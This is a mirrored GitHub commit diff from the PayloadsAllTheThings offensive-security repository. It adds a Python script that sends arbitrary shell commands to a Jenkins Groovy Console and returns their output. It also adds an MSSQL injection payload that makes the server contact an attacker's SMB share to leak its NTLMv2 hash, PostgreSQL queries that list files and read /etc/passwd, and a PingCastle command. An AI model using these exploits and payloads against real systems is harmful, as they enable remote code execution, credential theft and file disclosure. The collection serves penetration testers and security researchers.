mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Jenkins Grrovy + MSSQL UNC + PostgreSQL list files
This commit is contained in:
parent
eac421432a
commit
78c882fb34
30
CVE Exploits/Jenkins Groovy Console.py
Normal file
30
CVE Exploits/Jenkins Groovy Console.py
Normal file
@ -0,0 +1,30 @@
|
||||
#!/usr/bin/env python
|
||||
# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
|
||||
# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
|
||||
import requests
|
||||
import sys
|
||||
|
||||
print """
|
||||
Jenkins Groovy Console cmd runner.
|
||||
|
||||
usage: ./jgc.py [HOST]
|
||||
|
||||
Then type any command and wait for STDOUT output from remote machine.
|
||||
Type 'exit' to exit :)
|
||||
"""
|
||||
URL = sys.argv[1] + '/scriptText'
|
||||
HEADERS = {
|
||||
'User-Agent': 'jgc'
|
||||
}
|
||||
|
||||
while 1:
|
||||
CMD = raw_input(">> Enter command to execute (or type 'exit' to exit): ")
|
||||
if CMD == 'exit':
|
||||
print "exiting...\n"
|
||||
exit(0)
|
||||
|
||||
DATA = {
|
||||
'script': 'println "{}".execute().text'.format(CMD)
|
||||
}
|
||||
result = requests.post(URL, headers=HEADERS, data=DATA)
|
||||
print result.text
|
@ -68,6 +68,11 @@
|
||||
```
|
||||
|
||||
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
|
||||
* [Ping Castle](https://github.com/vletoux/pingcastle)
|
||||
|
||||
```powershell
|
||||
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
|
||||
```
|
||||
|
||||
## Most common paths to AD compromise
|
||||
|
||||
|
@ -137,6 +137,14 @@ EXEC sp_configure 'xp_cmdshell',1;
|
||||
RECONFIGURE;
|
||||
```
|
||||
|
||||
## MSSQL UNC Path
|
||||
|
||||
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
|
||||
|
||||
```sql
|
||||
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
|
||||
```
|
||||
|
||||
## MSSQL Make user DBA (DB admin)
|
||||
|
||||
```sql
|
||||
|
@ -26,9 +26,12 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||
## PostgreSQL File Read
|
||||
|
||||
```sql
|
||||
select pg_ls_dir('./');
|
||||
select pg_read_file('PG_VERSION', 0, 200);
|
||||
```
|
||||
|
||||
NOTE: ``pg_read_file` doesn't accept the `/` character.
|
||||
|
||||
```sql
|
||||
CREATE TABLE temp(t TEXT);
|
||||
COPY temp FROM '/etc/passwd';
|
||||
|
Loading…
Reference in New Issue
Block a user